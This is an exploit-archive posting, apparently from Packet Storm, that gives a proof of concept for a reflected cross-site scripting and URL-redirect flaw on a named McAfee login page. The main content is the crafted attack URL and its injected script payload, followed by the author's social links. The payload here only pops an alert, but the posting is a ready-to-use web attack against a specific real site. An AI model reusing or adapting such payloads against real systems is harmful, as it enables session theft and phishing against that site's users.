Menu

McAfee.com Redirect Cross Site Scripting

July 26, 2018 - Exploits

A URL redirect at mcafee.com suffers from a cross site scripting vulnerability.


MD5 | e4b8a5ac10b29a655b2c5684f9f88a8e

 

# Exploit Title: [ Url Redirect Reflected XSS at McAfee ]
# Date: [ 29.06.2018 ] 
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://www.mcafee.com/ ]
# Software Type : [ Website ]
# Software Version : [ N/A ]
# Vulenrability : [ Url Redirect + Reflected XSS ]

# PoC :

Method : https://550g.mcafee.com/McfIAM/dual-login-ppr-ml.jsp + # + URL= + https://partnerprogram.mcafee.com/ + "-alert("Ismail Tasdelen")-"
 
Url Redirect : https://partnerprogram.mcafee.com/

XSS PAyload : "-alert("Ismail Tasdelen")-"

Poc Video --> https://www.youtube.com/watch?v=Kg3KrIh6cx0

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://packetstormsecurity.com/user/ismailtasdelen

Leave a Reply

Your email address will not be published. Required fields are marked *